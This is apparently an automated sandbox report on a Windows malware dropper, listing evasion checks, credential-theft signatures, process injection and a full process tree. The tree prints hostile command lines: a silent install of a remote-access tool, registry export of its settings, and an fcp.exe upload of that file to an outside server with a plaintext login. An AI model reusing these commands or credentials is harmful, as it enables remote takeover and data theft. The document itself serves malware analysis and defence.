Analysis
max time kernel: 149s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/05/2025, 14:06
Static task: static1
Behavioral task: behavioral1
  Sample: 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
  Resource: win10v2004-20250502-en
Behavioral task: behavioral2
  Sample: 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
  Resource: win11-20250502-en
General
Target: 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Size: 9.1MB
MD5: 5626d4dd5d06b612402dc73b85243a7d
SHA1: 4111fa3b9fb47fc1fecad64e7b439251b89b724e
SHA256: a637241e14f11384415f02c09c63349c7b6a7e7e6b0eea58932c24f7650d0341
SHA512: 03b5f6f84dab5a384003cdf8fad17c6c4214276f871e673352939514bd0120dda24cb644fcc0a76060d82d6d7e69f8822471e18ef2d2acd170f258aabb1a366b
SSDEEP: 196608:iXKLL3IgcLx6WYo7JuSRZexCi/lk6/iljv4LX7XobiyUe/i/fnaDx:vL4pljJb+xCAlql74zjozR/iXo
Malware Config
Signatures

Rms family

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rfusclient.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rfusclient.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rfusclient.exe |

Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it from showing in Explorer, etc.

| pid | Process |
|---|---|
| 1812 | attrib.exe |

ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects a file using ACProtect software.

| resource | yara_rule |
|---|---|
| behavioral1/files/0x000800000002418c-178.dat | acprotect |
| behavioral1/files/0x000700000002418d-179.dat | acprotect |
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.

| description | ioc | Process |
|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rfusclient.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rfusclient.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rfusclient.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rfusclient.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rfusclient.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rfusclient.exe |

Checks computer location settings 2 TTPs 6 IoCs
Looks up the country code configured in the registry, likely a geofence.

| description | ioc | Process |
|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | WScript.exe |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | 123.exe |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | id.exe |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | WScript.exe |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | WScript.exe |

Executes dropped EXE 13 IoCs

| pid | Process |
|---|---|
| 2744 | 123.exe |
| 4216 | rCceQHavD.exe |
| 1952 | rutserv.exe |
| 2160 | wVJxOQKKa.exe |
| 60 | rutserv.exe |
| 824 | wVJxOQKKa.exe |
| 1048 | rutserv.exe |
| 552 | rutserv.exe |
| 2460 | rfusclient.exe |
| 768 | rfusclient.exe |
| 232 | id.exe |
| 4956 | rfusclient.exe |
| 2976 | fcp.exe |

Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | rutserv.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | rfusclient.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | rfusclient.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | rutserv.exe |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | rutserv.exe |

Loads dropped DLL 1 IoCs

| pid | Process |
|---|---|
| 2976 | fcp.exe |
Unsecured Credentials: Credentials In Files 1 TTPs
Steals credentials from unsecured files.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

| pid | Process |
|---|---|
| 1952 | rutserv.exe |
| 60 | rutserv.exe |
| 1048 | rutserv.exe |
| 552 | rutserv.exe |
| 2460 | rfusclient.exe |
| 768 | rfusclient.exe |
| 4956 | rfusclient.exe |

Suspicious use of SetThreadContext 2 IoCs

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 4216 set thread context of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 2160 set thread context of 824 | 2160 | wVJxOQKKa.exe | 107 |

YARA rule match: upx 2 IoCs

| resource | yara_rule |
|---|---|
| behavioral1/files/0x000800000002418c-178.dat | upx |
| behavioral1/files/0x000700000002418d-179.dat | upx |
Drops file in Program Files directory 25 IoCs

| description | ioc | Process |
|---|---|---|
| File created | C:\Program Files (x86)\System\__tmp_rar_sfx_access_check_240616000 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\vp8decoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\id.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System | attrib.exe |
| File created | C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.ini | 123.exe |
| File opened for modification | C:\Program Files (x86)\System | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\regedit.reg | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\install.bat | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\install.bat | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\rfusclient.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\123.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\install.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\vp8decoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\vp8encoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\rutserv.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\rutserv.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\rfusclient.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\123.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\install.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\test.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\vp8encoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\regedit.reg | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\System\id.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File created | C:\Program Files (x86)\System\test.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| File opened for modification | C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.exe | 123.exe |
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rfusclient.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wVJxOQKKa.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rfusclient.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | regedit.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | fcp.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 123.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rfusclient.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | regedit.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | id.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wVJxOQKKa.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rCceQHavD.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe |
Delays execution with timeout.exe 2 IoCs

| pid | Process |
|---|---|
| 1892 | timeout.exe |
| 2096 | timeout.exe |

Kills process with taskkill 2 IoCs

| pid | Process |
|---|---|
| 4568 | taskkill.exe |
| 1048 | taskkill.exe |

Modifies registry class 2 IoCs

| description | ioc | Process |
|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings | id.exe |

Runs .reg file with regedit 2 IoCs

| pid | Process |
|---|---|
| 1960 | regedit.exe |
| 596 | regedit.exe |

Suspicious behavior: EnumeratesProcesses 32 IoCs

| pid | Process |
|---|---|
| 1952 | rutserv.exe |
| 1952 | rutserv.exe |
| 1952 | rutserv.exe |
| 1952 | rutserv.exe |
| 1952 | rutserv.exe |
| 1952 | rutserv.exe |
| 1952 | rutserv.exe |
| 1952 | rutserv.exe |
| 60 | rutserv.exe |
| 60 | rutserv.exe |
| 60 | rutserv.exe |
| 60 | rutserv.exe |
| 1048 | rutserv.exe |
| 1048 | rutserv.exe |
| 1048 | rutserv.exe |
| 1048 | rutserv.exe |
| 552 | rutserv.exe |
| 552 | rutserv.exe |
| 552 | rutserv.exe |
| 552 | rutserv.exe |
| 552 | rutserv.exe |
| 552 | rutserv.exe |
| 552 | rutserv.exe |
| 552 | rutserv.exe |
| 2460 | rfusclient.exe |
| 2460 | rfusclient.exe |
| 768 | rfusclient.exe |
| 768 | rfusclient.exe |
| 768 | rfusclient.exe |
| 768 | rfusclient.exe |
| 4956 | rfusclient.exe |
| 4956 | rfusclient.exe |

Suspicious behavior: SetClipboardViewer 1 IoCs

| pid | Process |
|---|---|
| 4956 | rfusclient.exe |

Suspicious use of AdjustPrivilegeToken 9 IoCs

| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 1048 | taskkill.exe |
| Token: SeDebugPrivilege | 4568 | taskkill.exe |
| Token: SeDebugPrivilege | 1952 | rutserv.exe |
| Token: SeDebugPrivilege | 2160 | wVJxOQKKa.exe |
| Token: SeDebugPrivilege | 1048 | rutserv.exe |
| Token: SeTakeOwnershipPrivilege | 552 | rutserv.exe |
| Token: SeTcbPrivilege | 552 | rutserv.exe |
| Token: SeTcbPrivilege | 552 | rutserv.exe |
| Token: SeDebugPrivilege | 824 | wVJxOQKKa.exe |

Suspicious use of SetWindowsHookEx 4 IoCs

| pid | Process |
|---|---|
| 1952 | rutserv.exe |
| 60 | rutserv.exe |
| 1048 | rutserv.exe |
| 552 | rutserv.exe |
Suspicious use of WriteProcessMemory 64 IoCs

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 4928 wrote to memory of 4836 | 4928 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 88 |
| PID 4928 wrote to memory of 4836 | 4928 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 88 |
| PID 4928 wrote to memory of 4836 | 4928 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 88 |
| PID 4928 wrote to memory of 3044 | 4928 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 89 |
| PID 4928 wrote to memory of 3044 | 4928 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 89 |
| PID 4928 wrote to memory of 3044 | 4928 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 89 |
| PID 3044 wrote to memory of 2744 | 3044 | WScript.exe | 90 |
| PID 3044 wrote to memory of 2744 | 3044 | WScript.exe | 90 |
| PID 3044 wrote to memory of 2744 | 3044 | WScript.exe | 90 |
| PID 4836 wrote to memory of 2596 | 4836 | WScript.exe | 91 |
| PID 4836 wrote to memory of 2596 | 4836 | WScript.exe | 91 |
| PID 4836 wrote to memory of 2596 | 4836 | WScript.exe | 91 |
| PID 2596 wrote to memory of 1812 | 2596 | cmd.exe | 93 |
| PID 2596 wrote to memory of 1812 | 2596 | cmd.exe | 93 |
| PID 2596 wrote to memory of 1812 | 2596 | cmd.exe | 93 |
| PID 2596 wrote to memory of 1048 | 2596 | cmd.exe | 108 |
| PID 2596 wrote to memory of 1048 | 2596 | cmd.exe | 108 |
| PID 2596 wrote to memory of 1048 | 2596 | cmd.exe | 108 |
| PID 2744 wrote to memory of 4216 | 2744 | 123.exe | 96 |
| PID 2744 wrote to memory of 4216 | 2744 | 123.exe | 96 |
| PID 2744 wrote to memory of 4216 | 2744 | 123.exe | 96 |
| PID 2596 wrote to memory of 4568 | 2596 | cmd.exe | 98 |
| PID 2596 wrote to memory of 4568 | 2596 | cmd.exe | 98 |
| PID 2596 wrote to memory of 4568 | 2596 | cmd.exe | 98 |
| PID 2596 wrote to memory of 4296 | 2596 | cmd.exe | 99 |
| PID 2596 wrote to memory of 4296 | 2596 | cmd.exe | 99 |
| PID 2596 wrote to memory of 4296 | 2596 | cmd.exe | 99 |
| PID 2596 wrote to memory of 1960 | 2596 | cmd.exe | 100 |
| PID 2596 wrote to memory of 1960 | 2596 | cmd.exe | 100 |
| PID 2596 wrote to memory of 1960 | 2596 | cmd.exe | 100 |
| PID 2596 wrote to memory of 1892 | 2596 | cmd.exe | 101 |
| PID 2596 wrote to memory of 1892 | 2596 | cmd.exe | 101 |
| PID 2596 wrote to memory of 1892 | 2596 | cmd.exe | 101 |
| PID 2596 wrote to memory of 1952 | 2596 | cmd.exe | 103 |
| PID 2596 wrote to memory of 1952 | 2596 | cmd.exe | 103 |
| PID 2596 wrote to memory of 1952 | 2596 | cmd.exe | 103 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 4216 wrote to memory of 4820 | 4216 | rCceQHavD.exe | 104 |
| PID 2744 wrote to memory of 2160 | 2744 | 123.exe | 105 |
| PID 2744 wrote to memory of 2160 | 2744 | 123.exe | 105 |
| PID 2744 wrote to memory of 2160 | 2744 | 123.exe | 105 |
| PID 2596 wrote to memory of 60 | 2596 | cmd.exe | 106 |
| PID 2596 wrote to memory of 60 | 2596 | cmd.exe | 106 |
| PID 2596 wrote to memory of 60 | 2596 | cmd.exe | 106 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2160 wrote to memory of 824 | 2160 | wVJxOQKKa.exe | 107 |
| PID 2596 wrote to memory of 1048 | 2596 | cmd.exe | 108 |
| PID 2596 wrote to memory of 1048 | 2596 | cmd.exe | 108 |
| PID 2596 wrote to memory of 1048 | 2596 | cmd.exe | 108 |
| PID 2596 wrote to memory of 2096 | 2596 | cmd.exe | 111 |
| PID 2596 wrote to memory of 2096 | 2596 | cmd.exe | 111 |

Views/modifies file attributes 1 TTPs 1 IoCs

| pid | Process |
|---|---|
| 1812 | attrib.exe |
Processes

- C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"
  PID: 4928
  Signatures: Checks computer location settings; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Modifies registry class; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
    PID: 4836
    Signatures: Checks computer location settings; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "
      PID: 2596
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +s +h "C:\Program Files (x86)\System"
        PID: 1812
        Signatures: Sets file to hidden; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Views/modifies file attributes
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im rutserv.exe
        PID: 1048
        Signatures: System Location Discovery: System Language Discovery; Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im rfusclient.exe
        PID: 4568
        Signatures: System Location Discovery: System Language Discovery; Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\reg.exe
        Command line: reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        PID: 4296
        Signatures: System Location Discovery: System Language Discovery
      - C:\Windows\SysWOW64\regedit.exe
        Command line: regedit /s "regedit.reg"
        PID: 1960
        Signatures: System Location Discovery: System Language Discovery; Runs .reg file with regedit
      - C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 2
        PID: 1892
        Signatures: System Location Discovery: System Language Discovery; Delays execution with timeout.exe
      - C:\Program Files (x86)\System\rutserv.exe
        Command line: rutserv.exe /silentinstall
        PID: 1952
        Signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Identifies Wine through registry keys; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
      - C:\Program Files (x86)\System\rutserv.exe
        Command line: rutserv.exe /firewall
        PID: 60
        Signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Identifies Wine through registry keys; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
      - C:\Program Files (x86)\System\rutserv.exe
        Command line: rutserv.exe /start
        PID: 1048
        Signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Identifies Wine through registry keys; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
      - C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 2
        PID: 2096
        Signatures: System Location Discovery: System Language Discovery; Delays execution with timeout.exe
      - C:\Windows\SysWOW64\regedit.exe
        Command line: regedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
        PID: 596
        Signatures: System Location Discovery: System Language Discovery; Runs .reg file with regedit
    - C:\Program Files (x86)\System\id.exe
      Command line: "C:\Program Files (x86)\System\id.exe"
      PID: 232
      Signatures: Checks computer location settings; Executes dropped EXE; System Location Discovery: System Language Discovery; Modifies registry class
      - C:\Windows\SysWOW64\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"
        PID: 3876
        Signatures: Checks computer location settings; System Location Discovery: System Language Discovery
        - C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "
          PID: 1192
          Signatures: System Location Discovery: System Language Discovery
          - C:\Users\Admin\AppData\Local\Temp\fcp.exe
            Command line: fcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg
            PID: 2976
            Signatures: Executes dropped EXE; Loads dropped DLL; System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"
    PID: 3044
    Signatures: Checks computer location settings; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\System\123.exe
      Command line: "C:\Program Files (x86)\System\123.exe"
      PID: 2744
      Signatures: Checks computer location settings; Executes dropped EXE; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"
        PID: 4216
        Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\svchost.exe
          Command line: "C:\Windows\System32\svchost.exe"
          PID: 4820
          Signatures: System Location Discovery: System Language Discovery
      - C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
        PID: 2160
        Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
          PID: 824
          Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
